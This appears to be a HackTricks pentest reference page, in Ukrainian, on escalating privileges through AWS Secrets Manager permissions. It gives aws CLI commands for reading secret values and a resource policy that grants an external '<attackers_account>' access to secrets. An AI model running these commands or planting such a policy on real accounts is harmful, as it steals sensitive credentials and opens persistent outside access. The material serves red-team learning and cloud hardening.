AWS - Secrets Manager Privesc

Reading time: 2 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

Secrets Manager

Для отримання додаткової інформації про secrets manager дивіться:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Зловмисник, що має цей дозвіл, може отримати збережене значення всередині secret в AWS Secretsmanager.

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Потенційний вплив: Доступ до високочутливих даних у AWS Secrets Manager.

warning

Зауважте, що навіть маючи дозвіл secretsmanager:BatchGetSecretValue, зловмисник також потребуватиме secretsmanager:GetSecretValue для отримання конфіденційних секретів.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

За наявних дозволів можливо надати доступ іншим principals/accounts (навіть зовнішнім) для доступу до секрету. Зауважте, що щоб читати секрети, зашифровані за допомогою KMS key, користувачу також потрібен доступ до KMS key (більше інформації на KMS Enum page).

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks